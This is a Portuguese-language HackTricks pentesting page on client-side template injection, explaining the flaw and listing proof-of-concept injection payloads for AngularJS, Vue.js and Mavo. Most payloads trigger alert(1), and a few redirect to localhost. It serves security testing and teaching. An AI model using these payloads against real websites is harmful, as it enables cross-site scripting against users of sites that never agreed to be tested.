7.5 KiB
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
-
Você trabalha em uma empresa de segurança cibernética? Você quer ver sua empresa anunciada no HackTricks? ou você quer ter acesso à última versão do PEASS ou baixar o HackTricks em PDF? Confira os PLANOS DE ASSINATURA!
-
Descubra A Família PEASS, nossa coleção exclusiva de NFTs
-
Adquira o swag oficial do PEASS & HackTricks
-
Junte-se ao 💬 grupo Discord ou ao grupo telegram ou siga-me no Twitter 🐦@carlospolopm.
-
Compartilhe suas técnicas de hacking enviando PRs para o repositório hacktricks e hacktricks-cloud repo.
Resumo
É como uma Injeção de Template do Lado do Servidor (SSTI), mas no lado do cliente. O SSTI pode permitir que você execute código no servidor remoto, o CSTI pode permitir que você execute código JavaScript arbitrário na vítima.
A maneira de testar essa vulnerabilidade é muito semelhante ao caso do SSTI, o interpretador vai esperar algo para executar entre chaves duplas e irá executá-lo. Por exemplo, usando algo como: {{ 7-7 }}
se o servidor for vulnerável, você verá um 0
e, se não, verá o original: {{ 7-7 }}
AngularJS
AngularJS é uma biblioteca JavaScript popular, que examina o conteúdo dos nós HTML contendo o atributo ng-app
(também conhecido como diretiva AngularJS). Quando uma diretiva é adicionada ao código HTML, você pode executar expressões JavaScript dentro de chaves duplas.
Por exemplo, se sua entrada está sendo refletida dentro do corpo do HTML e o corpo é definido com ng-app
: <body ng-app>
Você pode executar código JavaScript arbitrário usando chaves duplas adicionando ao corpo:
{{$on.constructor('alert(1)')()}}
{{constructor.constructor('alert(1)')()}}
<input ng-focus=$event.view.alert('XSS')>
<!-- Google Research - AngularJS -->
<div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//localhost/mH/'"></textarea></div>
Você pode encontrar um exemplo básico online da vulnerabilidade no AngularJS em http://jsfiddle.net/2zs2yv7o/
{% hint style="danger" %}
Angular 1.6 removeu o sandbox então a partir desta versão um payload como {{constructor.constructor('alert(1)')()}}
ou <input ng-focus=$event.view.alert('XSS')>
deve funcionar.
{% endhint %}
VueJS
Você pode encontrar uma implementação vue.js vulnerável em https://vue-client-side-template-injection-example.azu.now.sh/
Payload funcionando: https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor(%27alert(%22foo%22)%27)()%7D%
E o código fonte do exemplo vulnerável aqui: https://github.com/azu/vue-client-side-template-injection-example
<!-- Google Research - Vue.js-->
"><div v-html="''.constructor.constructor('d=document;d.location.hash.match(\'x1\') ? `` : d.location=`//localhost/mH`')()"> aaa</div>
Um post realmente bom sobre CSTI em VUE pode ser encontrado em https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets
V3
{{_openBlock.constructor('alert(1)')()}}
Crédito: Gareth Heyes, Lewis Ardern e PwnFunction
V2
{{constructor.constructor('alert(1)')()}}
Crédito: Mario Heiderich
Verifique mais payloads VUE em https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#vuejs-reflected
Mavo
Payload:
[7*7]
[(1,alert)(1)]
<div mv-expressions="{{ }}">{{top.alert(1)}}</div>
[self.alert(1)]
javascript:alert(1)%252f%252f..%252fcss-images
[Omglol mod 1 mod self.alert (1) andlol]
[''=''or self.alert(lol)]
<a data-mv-if='1 or self.alert(1)'>test</a>
<div data-mv-expressions="lolx lolx">lolxself.alert('lol')lolx</div>
<a href=[javascript&':alert(1)']>test</a>
[self.alert(1)mod1]
Lista de Detecção de Força Bruta
Mais payloads em https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations
{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt" %}
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
-
Você trabalha em uma empresa de segurança cibernética? Você quer ver sua empresa anunciada no HackTricks? ou quer ter acesso à última versão do PEASS ou baixar o HackTricks em PDF? Confira os PLANOS DE ASSINATURA!
-
Descubra A Família PEASS, nossa coleção exclusiva de NFTs
-
Adquira o swag oficial do PEASS & HackTricks
-
Junte-se ao 💬 grupo do Discord ou ao grupo do telegram ou siga-me no Twitter 🐦@carlospolopm.
-
Compartilhe suas técnicas de hacking enviando PRs para o repositório hacktricks e hacktricks-cloud repo.